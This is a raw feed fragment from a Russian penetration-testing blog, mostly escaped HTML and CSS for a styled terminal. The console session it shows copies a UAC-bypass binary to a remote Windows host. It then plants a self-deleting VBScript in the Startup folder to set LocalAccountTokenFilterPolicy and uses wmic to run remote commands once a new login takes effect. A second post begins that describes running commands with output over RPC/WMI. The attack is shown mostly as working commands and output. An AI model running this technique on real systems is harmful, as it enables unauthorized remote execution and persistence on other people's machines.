    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
   background: -moz-linear-gradient(top,  #f41b16 0%, #fc7471 100%); /* FF3.6+ */
   background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f41b16), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
   background: -webkit-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
   background: -o-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* Opera 11.10+ */
   background: -ms-linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* IE10+ */
   background: linear-gradient(top,  #f41b16 0%,#fc7471 100%); /* W3C */   
}
.red:active{
     
    background: #972f2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #972f2e 0%, #fc7471 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#972f2e), color-stop(100%,#fc7471)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* IE10+ */
    background: linear-gradient(top,  #972f2e 0%,#fc7471 100%); /* W3C */    
}
.red .shine{    
    position: relative;
    top: -23px;
    left: 5px;  
}
.red .glow{
    position: relative;
    top: -22px;
}
.red .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #9b3a36;
    z-index: 50;
    opacity: 0;
}
/*--YELLOW--*/
.yellow{
    background: #f4a316; /* Old browsers */
    background: -moz-linear-gradient(left,  #f4a316 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, right top, color-stop(0%,#f4a316), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(left,  #f4a316 0%,#fcc371 100%); /* W3C */  
    margin:0px 7px;
}
.yellow:active{
    background: #ae4f1e; /* Old browsers */
    background: -moz-linear-gradient(top,  #ae4f1e 0%, #fcc371 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ae4f1e), color-stop(100%,#fcc371)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* IE10+ */
    background: linear-gradient(top,  #ae4f1e 0%,#fcc371 100%); /* W3C */    
}
.yellow .shine{ 
    position: relative;
    top: -23px;
    left: 5px;  
}
.yellow .glow{
    position: relative;
    top: -22px;
}


.yellow .glyph{
    position: relative;
    top: -7px;
    left: 4px;
    font-size: 24px;
    color: #854322;
    z-index: 50;
    opacity: 0;
    -webkit-transform: scaleY(1.5) scaleX(1.3);
}

/*--GREEN--*/
.green{
    
    background: #4cae2e; /* Old browsers */
    background: -moz-linear-gradient(top,  #4cae2e 0%, #dafc71 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#4cae2e), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* IE10+ */
    background: linear-gradient(top,  #4cae2e 0%,#dafc71 100%); /* W3C */
    
}
.green:active{
  background: #48752b; /* Old browsers */
  background: -moz-linear-gradient(top,  #48752b 0%, #dafc71 100%); /* FF3.6+ */
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#48752b), color-stop(100%,#dafc71)); /* Chrome,Safari4+ */
  background: -webkit-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Chrome10+,Safari5.1+ */
  background: -o-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* Opera 11.10+ */
  background: -ms-linear-gradient(top,  #48752b 0%,#dafc71 100%); /* IE10+ */
  background: linear-gradient(top,  #48752b 0%,#dafc71 100%); /* W3C */
  
}
.green .shine{  
    position: relative;
    top: -22px;
    left: 5px; 
}
.green .glow{
    position: relative;
    top: -22px;
}
.green .glyph{
    position: relative;
    top: -6px;
    left: 3px;
    font-size: 14px;
    font-weight: bold;
    color: #25571d;
    z-index: 50;
    opacity: 0;
}

/* Horrible to do this for firefox */
@-moz-document url-prefix() {
  
  .red .glyph {
      position: relative;
      top: -4px;
  }  
  .yellow .glyph {
      top: -4px;
      left: 3px;
  }
    
  .green .glyph{
      position: relative;
      top: -4px;
  }
  
}

/*-----TITLE-----*/
#title{
    float: left; 
    position: relative;
    top:4px;
    width:40%;
    left: 30%;
    font-family: "Myriad Pro", sans-serif; 
    font-size: 14px; 
    text-shadow: 0px 1px 0px rgba(255,255,255,0.5);
    line-height: 14px; 
}
.folder{
    float: left;
    margin-right:5px;
}
.folder .tab{
    width:4px;
    height:2px;
    background:#a4c5da;
    border:1px solid #728ea3;
    border-bottom: none;
    border-radius:2px 2px 0px 0px;
    -webkit-box-shadow:0px -1px 0px #99b5c7 inset;
    margin-left: 1px;
    z-index: 5000;
    margin-bottom: -1px; 
}
.folder .body{
    width: 14px;
    height: 10px;
    border:1px solid #6e8ba1;
    
    background: #b8cfe0; /* Old browsers */
    background: -moz-linear-gradient(top,  #b8cfe0 0%, #86adc8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#b8cfe0), color-stop(100%,#86adc8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* IE10+ */
    background: linear-gradient(top,  #b8cfe0 0%,#86adc8 100%); /* W3C */    
    
    z-index: -50;
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.25) inset,0px 1px 0px rgba(0,0,0,0.2);
}


#nav{
    margin: 1px 8px;
    float: left;
}
#view{
    margin: 2px 0 0 110px;
    display: inline-block;
}

.control_box{
    height:20px;
    border-radius: 3px;
    border: 1px solid #555;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #fefefe),color-stop(0, #b8b8b8));
    box-shadow:0px 1px 0px rgba(255,255,255,0.25);
}
.control_box .control{
    height:20px;
    border-right: 1px solid #2e2e2e;
    float: left;
    text-align: center; 
    width: 27px; 
}
.control:last-child{
    border-right: 0px solid !important;
}
.control:active{ 
    background: #b0afb0; 
    -webkit-box-shadow:0px 0px 4px #000 inset;
}
.active{
    background: #707070 !important;
    -webkit-box-shadow:0px 3px 4px rgba(0,0,0,0.6) inset !important;
}


#body {
    font-family: Andale Mono, monospace;  line-height: 1em;
    font-size:13px;
    float: left;
    width: 100%;
    min-height:130px;
    background:#000;
    padding:10px;
    line-height:1.5em;
}
#body p { 
   color: #63de00!important; 
}

@keyframes blink
{
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}

@-webkit-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
@-moz-keyframes blink {
 0%   {  background:rgba(99,222,0,100);  }
 100% {  background:rgba(99,222,0,0);  }
}
.cursor {
  background:#63de00; 
  display:inline-block;
  width:11px;
  height:19px;
  margin-bottom:-3px;
}
#body:hover .cursor {
    -webkit-animation-name: blink;
    -webkit-animation-duration: 1.5s;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blink;
    -moz-animation-duration: 1.5s;
    -moz-animation-iteration-count: infinite;
}
  
#body p::-webkit-selection  {
    background:#0b209e;
}
#body p::selection { background:#0b209e; }
#body p::-moz-selection { background:#0b209e; }

#body p {
  margin-top:5px;
  margin-bottom:5px;
  font-size:13px;
}

#content{
    float: left; 
    margin-top: 1px;
}
#foot{
    height: 23px;
    width: 100%;
    float: left;
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #cbcbcb),color-stop(0, #a7a7a7));
    border-top:1px solid #515151;
    border-radius:0 0 5px 5px;
}
#foot .handle{
    width: 11px;
    height: 11px;
    float: right;
    margin: 6px;
    overflow: hidden;
}
.handle .grip{
    -webkit-transform: rotate(45deg) scaley(3);
    margin: 2px 0 0 2px;
    color: #646464;
    text-shadow: 1px 1px 0 #c6c6c6;
    font-size: 14px;
}

.icon{
    width: 86px; 
    height: 100px;
    margin: 20px; 
    float: left;
    font-family: "Myriad Pro", sans-serif; 
    text-align: center; 
    font-size: 12px;
}
.icon .frame{
    width: 82px;
    height: 82px; 
    border-radius: 5px;
    border: 2px solid transparent; 
}
.icon .name{
    color: #000;
    padding-top: 3px; 
    border-radius:15px;
    width: 55px;
    margin: 5px 0 0 15px;
}
.icon .folder{
    margin:15px 0 0 6px;
}
&lt;/style&gt;&lt;br /&gt;
&lt;div id="window"&gt;&lt;div id="toolbar"&gt;&lt;div class="top"&gt;&lt;div id="lights"&gt;&lt;div class="light red"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light yellow"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="light green"&gt;&lt;div class="glyph"&gt;&lt;/div&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="title"&gt;&lt;div class="folder"&gt;&lt;div class="tab"&gt;&lt;/div&gt;&lt;div class="body"&gt;&lt;/div&gt;&lt;/div&gt;C:\Temp&amp;gt;&lt;/div&gt;&lt;div id="bubble"&gt;&lt;div class="shine"&gt;&lt;/div&gt;&lt;div class="glow"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="body"&gt;&lt;p&gt;Microsoft Windows [Версия 6.0.6001]&lt;br /&gt;
(C) Корпорация Майкрософт, 2006. Все права защищены.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net use \\RHOST\ADMIN$ /u:rhost\admin password&lt;br /&gt;
Системная ошибка 5.&lt;br /&gt;
Отказано в доступе.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;wmic /node:RHOST /user:rhost\admin /password:password process call create "cmd.exe /c ipconfig"&lt;br /&gt;
ERROR:&lt;br /&gt;
Code = 0x80070005&lt;br /&gt;
Description = Отказано в доступе.&lt;br /&gt;
Facility = Win32&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net use \\RHOST\ipc$ /u:rhost\admin password&lt;br /&gt;
Команда выполнена успешно.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net view \\RHOST /all&lt;br /&gt;
Общие ресурсы на \\RHOST&lt;br /&gt;
&lt;br /&gt;
Имя общего ресурса &amp;nbsp;Тип &amp;nbsp; Используется как &amp;nbsp;Комментарий&lt;br /&gt;
-------------------------------------------------------------------------------&lt;br /&gt;
ADMIN$ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Диск &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Удаленный Admin&lt;br /&gt;
C$ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Диск &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Стандартный общий ресурс&lt;br /&gt;
IPC$ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;IPC &amp;nbsp; (UNC) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Удаленный IPC&lt;br /&gt;
Users &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Диск&lt;br /&gt;
Команда выполнена успешно.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;dir \\RHOST\Users&lt;br /&gt;
&amp;nbsp;Том в устройстве \\RHOST\Users не имеет метки.&lt;br /&gt;
&amp;nbsp;Серийный номер тома: 5EE0-B619&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Содержимое папки \\RHOST\Users&lt;br /&gt;
&lt;br /&gt;
30.03.2014 &amp;nbsp;20:07 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;.&lt;br /&gt;
30.03.2014 &amp;nbsp;20:07 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;..&lt;br /&gt;
30.03.2014 &amp;nbsp;20:00 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;admin&lt;br /&gt;
30.03.2014 &amp;nbsp;18:10 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Public&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 файлов &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 байт&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4 папок &amp;nbsp; 6 799 081 472 байт свободно&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;dir "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"&lt;br /&gt;
&amp;nbsp;Том в устройстве \\RHOST\Users не имеет метки.&lt;br /&gt;
&amp;nbsp;Серийный номер тома: 5EE0-B619&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Содержимое папки \\RHOST\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;br /&gt;
&lt;br /&gt;
30.03.2014 &amp;nbsp;23:34 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;.&lt;br /&gt;
30.03.2014 &amp;nbsp;23:34 &amp;nbsp; &amp;nbsp;&amp;lt;DIR&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;..&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 файлов &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;0 байт&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2 папок &amp;nbsp; 6 799 081 472 байт свободно&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;copy /Y bypassuac.exe \\RHOST\Users\admin\AppData\Local\Temp\&lt;br /&gt;
Скопировано файлов: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;type logon.vbs&lt;br /&gt;
On Error Resume Next&lt;br /&gt;
Set WshShell = WScript.CreateObject("WScript.Shell")&lt;br /&gt;
WshShell.Run "C:\Users\admin\AppData\Local\Temp\bypassuac.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f",0,true&lt;br /&gt;
Set objFSO = CreateObject("Scripting.FileSystemObject")&lt;br /&gt;
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\bypassuac.exe",true&lt;br /&gt;
objFSO.DeleteFile "C:\Users\admin\AppData\Local\Temp\tior.exe",true&lt;br /&gt;
objFSO.DeleteFile Wscript.ScriptFullName,true&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;copy /Y logon.vbs "\\RHOST\Users\admin\AppData\Roaming\Microsoft\Wi&lt;br /&gt;
ndows\Start Menu\Programs\Startup\"&lt;br /&gt;
Скопировано файлов: &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net use \\RHOST\ipc$ /del&lt;br /&gt;
\\RHOST\ipc$ успешно удален.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt; /* WAIT WAIT&lt;br /&gt;
C:\Temp&amp;gt; /* logoff/login user */&lt;br /&gt;
C:\Temp&amp;gt; WAIT */&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;net use \\RHOST\ADMIN$ /u:rhost\admin password&lt;br /&gt;
Команда выполнена успешно.&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;wmic /node:RHOST /user:rhost\admin /password:password process cal&lt;br /&gt;
l create "cmd.exe /c ipconfig"&lt;br /&gt;
Executing (Win32_Process)-&amp;gt;Create()&lt;br /&gt;
Method execution successful.&lt;br /&gt;
Out Parameters:&lt;br /&gt;
instance of __PARAMETERS&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ProcessId = 4320;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ReturnValue = 0;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
C:\Temp&amp;gt;&lt;/p&gt;&lt;div class="cursor"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[hacking tricks] Exec via RPC with output</title><link>http://devteev.blogspot.com/2014/03/hacking-tricks-exec-via-rpc-with-output.html</link><category>Command Execution</category><category>Microsoft</category><category>RPC</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 28 Mar 2014 04:59:00 +0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6418515115809105659</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Иногда бывают такие ситуации, когда на удаленном хосте под управлением операционной системы Windows (выше 9x)) файрволом прикрыты все управляющие порты (SMB, WinRM, RDP, etc) кроме 135/tcp RPC. И вот вроде бы и нужные права имеются, и даже удаленный exec отрабатывает, но ходишь вокруг такой машины, как слепой котенок, облизываешься, в надежде, что&amp;nbsp;msf multi/handler выдаст заветное приглашение. Пора прозреть!&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX4zFYWYsnBYSd5BZLC-G7v2Ak1bnZP_oI6mtWkgLL6qs4pF2oeKpnl8B_Ih2DX3PBDQi99twJEkyQgGvIyWU9b5m2GUS9MWucVb35zlsb1a7ck7Wo8a-WwsPb77XC3UvGjjdp3yJ02u0/s3200/wmic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX4zFYWYsnBYSd5BZLC-G7v2Ak1bnZP_oI6mtWkgLL6qs4pF2oeKpnl8B_Ih2DX3PBDQi99twJEkyQgGvIyWU9b5m2GUS9MWucVb35zlsb1a7ck7Wo8a-WwsPb77XC3UvGjjdp3yJ02u0/s3200/wmic.png" height="348" width="550" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Предлагаемый мною способ прост как две копейки и основан на возможности работы с реестром через WMI (к слову, служба удаленного реестра тут не используется). Пруф ниже.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ЗЫ: &amp;nbsp;концепт схож с подходом, используемым парнями из &lt;a href="http://www.dsec.ru/" target="_blank"&gt;DSEC&lt;/a&gt; при выполнении команд через&amp;nbsp;&lt;a href="http://www.xakep.ru/post/54157/" target="_blank"&gt;Quick Console в Lotus Domino&lt;/a&gt;.&lt;/div&gt;&lt;style&gt;
/* http://cssdeck.com/labs/pure-css-osx-terminal */
body { background:#d2dfe6;
color: #444;
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
line-height: 1.5em;
}

/* FINDER WINDOW */

#window{
    width: 90%;
    margin-top:40px;
 margin-left: auto;
 margin-right: auto;
    margin-bottom:40px;
    min-width: 500px; 
    background: #fff;
    border-radius: 5px;
    -webkit-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    -moz-box-shadow: 0px 0px 20px rgba(0,0,0,0.75);
    /*-webkit-transition:all 0.5s; */
    overflow: hidden; 
}

/* TOP BAR */
#topbar{
    width: 100%;
    height: 21px;
    font-size: 16px;
    font-family: "Myriad Pro", sans-serif;
    text-shadow:0px 1px 0px rgba(255,255,255,0.25);
    -webkit-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
    -moz-box-shadow:0 1px 0 rgba(0,0,0,0.5); 
   
    
}
#topbar ul li {
    float: left; 
    padding:0 10px;
    height: 21px;
    line-height: 24px;
}
#topbar ul li:first-child{
    font-size: 20px;
    line-height: 26px;
    margin-left: 5px;
}
#topbar ul li:nth-child(2){
    font-family: "Myriad-Semi", sans-serif;
}
#topbar ul li:active{
    background-image: -webkit-gradient(linear,left bottom,left top,color-stop(1, #4a82ff),color-stop(0, #0052fc));
    color: #fff;
    text-shadow: none;
}
#toolbar{
    width: 100%; 
    height: 25px;
    background: grey;
    border-radius:5px 5px 0 0;

    background: #cfcfcf; /* Old browsers */
    background: -moz-linear-gradient(top,  #cfcfcf 0%, #a8a8a8 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#cfcfcf), color-stop(100%,#a8a8a8)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* IE10+ */
    background: linear-gradient(top,  #cfcfcf 0%,#a8a8a8 100%); /* W3C */
    
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5) inset,0px 1px 0px #515151;        
    
}
#toolbar .top{
    float: left; 
    width: 100%; 
    height: 23px;
}
#toolbar .bottom{
    float: left; 
    width: 100%; 
    height: 30px;
}

/*-----TRAFFIC LIGHTS-----*/
#toolbar #lights{
    float: left;
    position:relative;
    top:4px;
    left:7px; 
}
.light{
    float:left;
    width:14px;
    height:14px;
    border-radius:14px;
    -webkit-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    -moz-box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    box-shadow:0px 1px 0px rgba(255,255,255,0.5),0px 0px 3px #000 inset;
    overflow: hidden;
}
#lights:hover .glyph{
    opacity: 1;
    cursor:default;
    
}
.light .shine{
     width: 4px;
     height:3px;
     border-radius:10px;
     /*background-image: -webkit-gradient(radial, center center, 0, center center, 3, from(rgba(255,255,255,1)), to(rgba(255,255,255,0)));*/
     background: -moz-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%, rgba(255,255,255,0) 100%); /* FF3.6+ */    
     background-image: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(255,255,255,1)), color-stop(100%,rgba(255,255,255,0))); /* Chrome,Safari4+ */
     background: -webkit-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Chrome10+,Safari5.1+ */
     background: -o-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* Opera 12+ */
     background: -ms-radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* IE10+ */
     background: radial-gradient(center, ellipse cover,  rgba(255,255,255,1) 0%,rgba(255,255,255,0) 100%); /* W3C */
     
}
.light .glow{
    width:14px;
    height:8px; 
    background-image: -webkit-gradient(radial, center bottom, 0, center center, 5, from(rgba(255,255,255,0.75)), to(rgba(255,255,255,0)));
    background: 0px 0px -moz-radial-gradient(bottom, cover,  rgba(255,255,255,0.70) 0%, rgba(255,255,255,0) 80%); /* FF3.6+ */
   
}
/*--RED--*/
.red{
   background: #f41b16; /* Old browsers */
